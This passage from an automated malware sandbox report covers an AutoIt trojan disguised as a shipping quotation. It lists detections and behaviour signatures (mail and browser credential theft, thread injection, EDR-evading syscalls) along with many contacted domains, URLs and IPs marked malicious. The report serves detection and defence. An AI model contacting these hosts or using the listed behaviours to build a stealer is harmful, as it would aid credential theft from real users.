16->27 29 10 other IPs or domains 16->29 37 Found direct / indirect Syscall (likely to bypass EDR) 16->37 20 cmdkey.exe 13 16->20         started        signatures10 process11 signatures12 49 Tries to steal Mail credentials (via file / registry access) 20->49 51 Tries to harvest and steal browser information (history, passwords, etc) 20->51 53 Modifies the context of a thread in another process (thread injection) 20->53 55 2 other signatures 20->55 23 firefox.exe 20->23         started        process13

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              QUOTATION#070125-ELITE MARINE .exe61%ReversingLabsWin32.Trojan.AutoitInject
              QUOTATION#070125-ELITE MARINE .exe100%AviraDR/AutoIt.Gen8
              QUOTATION#070125-ELITE MARINE .exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              No Antivirus matches

              URLs

              SourceDetectionScannerLabelLink
              http://www.rpa.asia/bwjl/0%Avira URL Cloudsafe
              http://www.furrcali.xyz/k29t/?lV=mLM4NyV3Rm7LSF62zq3qpsssB1F7jUkflC/cwX9Xx9eDQBJ7/gNt59cujgLWGeygpdsHuHQ6ZT1nZEeE6AzqPDDMRo6XGpuD1XHiaV6xOj1iJ+/0Z9jT4Yg=&LSbaT=zft4LoBw0%Avira URL Cloudsafe
              http://www.100millionjobs.africa/cxj4/?lV=gKtC9mpNHTkTr00OOrlul8C1Q+DXvNuoM8EbXMKNjeYmEZtcGajyBctrWO6oEHOoogFTlfS8+DNQw55D2MfCqAhjIjNgZ6kwkHLqILyFVQkk3fe4uC3E7DA=&LSbaT=zft4LoBw0%Avira URL Cloudsafe
              https://static.loopia.se/responsive/images/iOS-72.png0%Avira URL Cloudsafe
              https://www.furrcali.xyz/k29t/?lV=mLM4NyV3Rm7LSF62zq3qpsssB1F7jUkflC/cwX9Xx9eDQBJ7/gNt59cujgLWGeygpd0%Avira URL Cloudsafe
              http://www.givvjn.info/nkmx/?lV=eUQnbnMYY/LCOqGESTL4TQrP6i0At1UjsamtmjAjCJYjPTSalXudwPcRr9EknZYtOZpCljWDkwtbq6MUXcKSC+3UVsfypEs97CYth90fPOn8W2O2KjrJHqc=&LSbaT=zft4LoBw0%Avira URL Cloudsafe
              http://www.mirenzhibo.net/wbfy/?lV=Xeeb3ImT6ZQQytgHl6ygbKjk3RvUis2KlqPkukVQbKRvaGCiHgrQQJpKPHE9m9OFKl001Zh7fqviaNy8QasigmVtVgrnFrjMGvUSPQegMjeyq5uNXxHJj0c=&LSbaT=zft4LoBw0%Avira URL Cloudsafe
              http://maximumgroup.co.za/cxj4/?lV=gKtC9mpNHTkTr00OOrlul8C1Q0%Avira URL Cloudsafe
              http://www.ogbos88.cyou/kj1o/0%Avira URL Cloudsafe
              http://www.buyspeechst.shop/w98i/?lV=UfwHaNGeM7ohZqxMT1oJCRJMGlT3jOeFYxLhiKeMkeFhJQngpiBu1nR/iO/Vw2KMOuQK2IyXNyNkQANnRhWnyAeSvZ4PYAj0T7gn5XvtXdm/7Udw9aOHtOE=&LSbaT=zft4LoBw0%Avira URL Cloudsafe
              http://www.bonheur.tech/t3iv/0%Avira URL Cloudsafe
              http://www.chiro.live/jwa9/0%Avira URL Cloudsafe
              http://www.ogbos88.cyou0%Avira URL Cloudsafe
              https://static.loopia.se/shared/logo/logo-loopia-white.svg0%Avira URL Cloudsafe
              http://www.bonheur.tech/t3iv/?lV=P136bSYw/boin6utEBZ7PLC682DYGQHk9qKLeTmXrWAePyaHTSDMFoauBTWx0ig1S3CVFsx30iUtjRVQiBy55I3Yp99Gh3kk8H5H2AEMqkWB6gkiSHADwPc=&LSbaT=zft4LoBw0%Avira URL Cloudsafe
              https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking0%Avira URL Cloudsafe
              http://www.buyspeechst.shop/w98i/0%Avira URL Cloudsafe
              http://www.furrcali.xyz/k29t/0%Avira URL Cloudsafe
              https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe0%Avira URL Cloudsafe
              https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw0%Avira URL Cloudsafe
              http://www.nextlevel.finance/kgjj/0%Avira URL Cloudsafe
              http://www.100millionjobs.africa/cxj4/0%Avira URL Cloudsafe
              http://www70.chiro.live/0%Avira URL Cloudsafe
              https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park0%Avira URL Cloudsafe
              http://www.chiro.live/jwa9/?lV=nbEb6BapjrCYd3vpIU65dRTaoPK2c484Z9DLelTcrJ4p8hOiBplI39ztzhaal76qFYKe8ooJF22mI/JvRPR9KZtEPsGPSZvpHz4gKRb9RHtiv87SZwxMyIk=&LSbaT=zft4LoBw0%Avira URL Cloudsafe
              http://www.zbywl.com/js.js0%Avira URL Cloudsafe
              https://static.loopia.se/shared/images/additional-pages-hero-shape.webp0%Avira URL Cloudsafe
              https://static.loopia.se/shared/style/2022-extra-pages.css0%Avira URL Cloudsafe
              http://www.nextlevel.finance/kgjj/?lV=m0PzV+DL9MdhQie6uq/amrvVR35Q8Tf/lotYUX+AhjMoQA7F3K3FjPv8kV/QBw/PdU/OXM/ri/IbrFYG4xypiABwnaSWREGU3uu7ZYXkuMLBntBAotkskh0=&LSbaT=zft4LoBw0%Avira URL Cloudsafe
              https://static.loopia.se/responsive/images/iOS-114.png0%Avira URL Cloudsafe
              http://www.bokus.site/qps0/0%Avira URL Cloudsafe
              http://www.givvjn.info/nkmx/0%Avira URL Cloudsafe
              http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut0%Avira URL Cloudsafe
              https://ogbos88vip.click0%Avira URL Cloudsafe
              https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park0%Avira URL Cloudsafe
              https://static.loopia.se/responsive/styles/reset.css0%Avira URL Cloudsafe
              http://www.rpa.asia/bwjl/?lV=DlXUXSIcZnIsgzl0u4NtOaZFY3Bzu0GepY2CMnKH5/Z+wLXeqyLz34dEMj2dm6NLuVk54f0N3OpI5VHZ7BJAsS5zdqtXFQ+nWWO+v3ILJktUUuvXcybstOw=&LSbaT=zft4LoBw0%Avira URL Cloudsafe
              https://static.loopia.se/responsive/images/iOS-57.png0%Avira URL Cloudsafe
              http://www.mirenzhibo.net/wbfy/0%Avira URL Cloudsafe
              http://www.mzkd6gp5.top/3u0p/?lV=s2YzwEkhsdaL/kJQlHk7A3SE2/Z36REv9AUKdpz0O4EFo1wYmv8+70PTeuLpJbel1HoKntoiuCCwLjgxW1UIuCv8mzvY6w9FRbC+/5arF9GGIcX7zSRGFgQ=&LSbaT=zft4LoBw0%Avira URL Cloudsafe
              http://www.mzkd6gp5.top/3u0p/0%Avira URL Cloudsafe
              https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa0%Avira URL Cloudsafe
              http://www.chiro.live/jwa9?gp=1&js=1&uuid=1736437877.0005169428&other_args=eyJ1cmkiOiAiL2p3YTkiLCAiY0%Avira URL Cloudsafe
              https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin0%Avira URL Cloudsafe
              https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa0%Avira URL Cloudsafe
              https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa0%Avira URL Cloudsafe
              https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              www.rpa.asia
              		160.25.166.123
              		truetrue
                		unknown
                www.mirenzhibo.net
                		202.95.11.110
                		truetrue
                  		unknown
                  www.furrcali.xyz
                  		103.106.67.112
                  		truetrue
                    		unknown
                    www.milp.store
                    		194.9.94.85
                    		truetrue
                      		unknown
                      www.bonheur.tech
                      		76.223.54.146
                      		truetrue
                        		unknown
                        www.chiro.live
                        		198.58.118.167
                        		truetrue
                          		unknown
                          www.bokus.site
                          		199.192.21.169
                          		truetrue
                            		unknown
                            www.givvjn.info
                            		47.83.1.90
                            		truetrue
                              		unknown
                              www.mzkd6gp5.top
                              		104.21.96.1
                              		truetrue
                                		unknown
                                100millionjobs.africa
                                		136.243.64.147
                                		truetrue
                                  		unknown
                                  www.nextlevel.finance
                                  		76.223.54.146
                                  		truetrue
                                    		unknown
                                    www.ogbos88.cyou
                                    		104.21.13.141
                                    		truetrue
                                      		unknown
                                      www.buyspeechst.shop
                                      		104.21.112.1
                                      		truetrue
                                        		unknown
                                        www.elettrocoltura.info
                                        		unknown
                                        		unknownfalse
                                          		unknown
                                          www.100millionjobs.africa
                                          		unknown
                                          		unknownfalse
                                            		unknown
                                            www.lejgnu.info
                                            		unknown
                                            		unknownfalse
                                              		unknown
                                              www.smartbath.shop
                                              		unknown
                                              		unknownfalse
                                                		unknown

                                                Contacted URLs

                                                NameMaliciousAntivirus DetectionReputation
                                                http://www.100millionjobs.africa/cxj4/?lV=gKtC9mpNHTkTr00OOrlul8C1Q+DXvNuoM8EbXMKNjeYmEZtcGajyBctrWO6oEHOoogFTlfS8+DNQw55D2MfCqAhjIjNgZ6kwkHLqILyFVQkk3fe4uC3E7DA=&LSbaT=zft4LoBwtrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.rpa.asia/bwjl/true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.furrcali.xyz/k29t/?lV=mLM4NyV3Rm7LSF62zq3qpsssB1F7jUkflC/cwX9Xx9eDQBJ7/gNt59cujgLWGeygpdsHuHQ6ZT1nZEeE6AzqPDDMRo6XGpuD1XHiaV6xOj1iJ+/0Z9jT4Yg=&LSbaT=zft4LoBwtrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.ogbos88.cyou/kj1o/true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.mirenzhibo.net/wbfy/?lV=Xeeb3ImT6ZQQytgHl6ygbKjk3RvUis2KlqPkukVQbKRvaGCiHgrQQJpKPHE9m9OFKl001Zh7fqviaNy8QasigmVtVgrnFrjMGvUSPQegMjeyq5uNXxHJj0c=&LSbaT=zft4LoBwtrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.buyspeechst.shop/w98i/?lV=UfwHaNGeM7ohZqxMT1oJCRJMGlT3jOeFYxLhiKeMkeFhJQngpiBu1nR/iO/Vw2KMOuQK2IyXNyNkQANnRhWnyAeSvZ4PYAj0T7gn5XvtXdm/7Udw9aOHtOE=&LSbaT=zft4LoBwtrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.givvjn.info/nkmx/?lV=eUQnbnMYY/LCOqGESTL4TQrP6i0At1UjsamtmjAjCJYjPTSalXudwPcRr9EknZYtOZpCljWDkwtbq6MUXcKSC+3UVsfypEs97CYth90fPOn8W2O2KjrJHqc=&LSbaT=zft4LoBwtrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.chiro.live/jwa9/true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.furrcali.xyz/k29t/true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.buyspeechst.shop/w98i/true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.bonheur.tech/t3iv/true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.bonheur.tech/t3iv/?lV=P136bSYw/boin6utEBZ7PLC682DYGQHk9qKLeTmXrWAePyaHTSDMFoauBTWx0ig1S3CVFsx30iUtjRVQiBy55I3Yp99Gh3kk8H5H2AEMqkWB6gkiSHADwPc=&LSbaT=zft4LoBwtrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.100millionjobs.africa/cxj4/true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.chiro.live/jwa9/?lV=nbEb6BapjrCYd3vpIU65dRTaoPK2c484Z9DLelTcrJ4p8hOiBplI39ztzhaal76qFYKe8ooJF22mI/JvRPR9KZtEPsGPSZvpHz4gKRb9RHtiv87SZwxMyIk=&LSbaT=zft4LoBwtrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.nextlevel.finance/kgjj/true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.nextlevel.finance/kgjj/?lV=m0PzV+DL9MdhQie6uq/amrvVR35Q8Tf/lotYUX+AhjMoQA7F3K3FjPv8kV/QBw/PdU/OXM/ri/IbrFYG4xypiABwnaSWREGU3uu7ZYXkuMLBntBAotkskh0=&LSbaT=zft4LoBwtrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.givvjn.info/nkmx/true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.bokus.site/qps0/true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.mirenzhibo.net/wbfy/true
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.mzkd6gp5.top/3u0p/?lV=s2YzwEkhsdaL/kJQlHk7A3SE2/Z36REv9AUKdpz0O4EFo1wYmv8+70PTeuLpJbel1HoKntoiuCCwLjgxW1UIuCv8mzvY6w9FRbC+/5arF9GGIcX7zSRGFgQ=&LSbaT=zft4LoBwtrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.rpa.asia/bwjl/?lV=DlXUXSIcZnIsgzl0u4NtOaZFY3Bzu0GepY2CMnKH5/Z+wLXeqyLz34dEMj2dm6NLuVk54f0N3OpI5VHZ7BJAsS5zdqtXFQ+nWWO+v3ILJktUUuvXcybstOw=&LSbaT=zft4LoBwtrue
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.mzkd6gp5.top/3u0p/true
                                                • Avira URL Cloud: safe
                                                		unknown

                                                URLs from Memory and Binaries

                                                NameSourceMaliciousAntivirus DetectionReputation
                                                https://duckduckgo.com/chrome_newtabcmdkey.exe, 00000003.00000003.11922384899.00000000080E9000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000003.11918930615.0000000008077000.00000004.00000020.00020000.00000000.sdmp, b427-I_1.3.drfalse
                                                  		high
                                                  https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/searchcmdkey.exe, 00000003.00000003.11922384899.00000000080E9000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000003.11918930615.0000000008077000.00000004.00000020.00020000.00000000.sdmp, b427-I_1.3.drfalse
                                                    		high
                                                    https://duckduckgo.com/ac/?q=b427-I_1.3.drfalse
                                                      		high
                                                      http://maximumgroup.co.za/cxj4/?lV=gKtC9mpNHTkTr00OOrlul8C1Qcmdkey.exe, 00000003.00000002.15247546664.00000000050E8000.00000004.10000000.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://www.furrcali.xyz/k29t/?lV=mLM4NyV3Rm7LSF62zq3qpsssB1F7jUkflC/cwX9Xx9eDQBJ7/gNt59cujgLWGeygpdcmdkey.exe, 00000003.00000002.15247546664.000000000559E000.00000004.10000000.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://push.zhanzhang.baidu.com/push.jsRAVCpl64.exe, 00000002.00000002.16214552888.0000000007C0A000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.000000000527A000.00000004.10000000.00040000.00000000.sdmpfalse
                                                        		high
                                                        https://static.loopia.se/responsive/images/iOS-72.pngRAVCpl64.exe, 00000002.00000002.16214552888.0000000006AC4000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000004134000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.0000000002D04000.00000004.80000000.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.ogbos88.cyouRAVCpl64.exe, 00000002.00000002.16205103694.000000000349E000.00000040.80000000.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingRAVCpl64.exe, 00000002.00000002.16214552888.0000000006AC4000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15248937928.0000000006630000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000004134000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.0000000002D04000.00000004.80000000.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://www.google.com/images/branding/product/ico/googleg_alldp.icocmdkey.exe, 00000003.00000003.11918930615.0000000008077000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://static.loopia.se/shared/logo/logo-loopia-white.svgRAVCpl64.exe, 00000002.00000002.16214552888.0000000006AC4000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15248937928.0000000006630000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000004134000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.0000000002D04000.00000004.80000000.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweRAVCpl64.exe, 00000002.00000002.16214552888.0000000006AC4000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15248937928.0000000006630000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000004134000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.0000000002D04000.00000004.80000000.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwRAVCpl64.exe, 00000002.00000002.16214552888.0000000006AC4000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15248937928.0000000006630000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000004134000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.0000000002D04000.00000004.80000000.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=cmdkey.exe, 00000003.00000003.11922384899.00000000080E9000.00000004.00000020.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000003.11918930615.0000000008077000.00000004.00000020.00020000.00000000.sdmp, b427-I_1.3.drfalse
                                                            		high
                                                            http://www.zbywl.com/js.jsRAVCpl64.exe, 00000002.00000002.16214552888.0000000007C0A000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.000000000527A000.00000004.10000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkRAVCpl64.exe, 00000002.00000002.16214552888.0000000006AC4000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15248937928.0000000006630000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000004134000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.0000000002D04000.00000004.80000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www70.chiro.live/cmdkey.exe, 00000003.00000002.15247546664.00000000042C6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://static.loopia.se/shared/images/additional-pages-hero-shape.webpRAVCpl64.exe, 00000002.00000002.16214552888.0000000006AC4000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15248937928.0000000006630000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000004134000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.0000000002D04000.00000004.80000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://static.loopia.se/shared/style/2022-extra-pages.cssRAVCpl64.exe, 00000002.00000002.16214552888.0000000006AC4000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15248937928.0000000006630000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000004134000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.0000000002D04000.00000004.80000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://static.loopia.se/responsive/images/iOS-114.pngRAVCpl64.exe, 00000002.00000002.16214552888.0000000006AC4000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000004134000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.0000000002D04000.00000004.80000000.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icocmdkey.exe, 00000003.00000003.11922384899.00000000080E9000.00000004.00000020.00020000.00000000.sdmp, b427-I_1.3.drfalse
                                                              		high
                                                              https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkRAVCpl64.exe, 00000002.00000002.16214552888.0000000006AC4000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15248937928.0000000006630000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000004134000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.0000000002D04000.00000004.80000000.00040000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=b427-I_1.3.drfalse
                                                                		high
                                                                https://zz.bdstatic.com/linksubmit/push.jsRAVCpl64.exe, 00000002.00000002.16214552888.0000000007C0A000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.000000000527A000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                  		high
                                                                  https://ogbos88vip.clickRAVCpl64.exe, 00000002.00000002.16214552888.0000000007754000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000004DC4000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utRAVCpl64.exe, 00000002.00000002.16214552888.0000000006AC4000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15248937928.0000000006630000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000004134000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.0000000002D04000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://www.ecosia.org/newtab/cmdkey.exe, 00000003.00000003.11918930615.0000000008077000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://static.loopia.se/responsive/styles/reset.cssRAVCpl64.exe, 00000002.00000002.16214552888.0000000006AC4000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15248937928.0000000006630000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000004134000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.0000000002D04000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://ac.ecosia.org/autocomplete?q=cmdkey.exe, 00000003.00000003.11918930615.0000000008077000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://static.loopia.se/responsive/images/iOS-57.pngRAVCpl64.exe, 00000002.00000002.16214552888.0000000006AC4000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000004134000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.0000000002D04000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=paRAVCpl64.exe, 00000002.00000002.16214552888.0000000006AC4000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15248937928.0000000006630000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000004134000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.0000000002D04000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=paRAVCpl64.exe, 00000002.00000002.16214552888.0000000006AC4000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15248937928.0000000006630000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000004134000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.0000000002D04000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkinRAVCpl64.exe, 00000002.00000002.16214552888.0000000006AC4000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15248937928.0000000006630000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000004134000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.0000000002D04000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=cmdkey.exe, 00000003.00000003.11918930615.0000000008077000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.chiro.live/jwa9?gp=1&js=1&uuid=1736437877.0005169428&other_args=eyJ1cmkiOiAiL2p3YTkiLCAiYRAVCpl64.exe, 00000002.00000002.16214552888.0000000006C56000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15248937928.0000000006630000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.00000000042C6000.00000004.10000000.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://gemini.google.com/app?q=cmdkey.exe, 00000003.00000003.11918930615.0000000008077000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=paRAVCpl64.exe, 00000002.00000002.16214552888.0000000006AC4000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15248937928.0000000006630000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000004134000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.0000000002D04000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwebRAVCpl64.exe, 00000002.00000002.16214552888.0000000006AC4000.00000004.80000000.00040000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15248937928.0000000006630000.00000004.00000800.00020000.00000000.sdmp, cmdkey.exe, 00000003.00000002.15247546664.0000000004134000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000004.00000002.12026501861.0000000002D04000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown

                                                                          World Map of Contacted IPs

                                                                          • No. of IPs < 25%
                                                                          • 25% < No. of IPs < 50%
                                                                          • 50% < No. of IPs < 75%
                                                                          • 75% < No. of IPs

                                                                          Public IPs

                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                          160.25.166.123
                                                                          		www.rpa.asiaunknown
                                                                          		17676GIGAINFRASoftbankBBCorpJPtrue
                                                                          103.106.67.112
                                                                          		www.furrcali.xyzNew Zealand
                                                                          		56030VOYAGERNET-AS-APVoyagerInternetLtdNZtrue
                                                                          104.21.112.1
                                                                          		www.buyspeechst.shopUnited States
                                                                          		13335CLOUDFLARENETUStrue
                                                                          194.9.94.85
                                                                          		www.milp.storeSweden
                                                                          		39570LOOPIASEtrue
                                                                          199.192.21.169
                                                                          		www.bokus.siteUnited States
                                                                          		22612NAMECHEAP-NETUStrue
                                                                          47.83.1.90
                                                                          		www.givvjn.infoUnited States
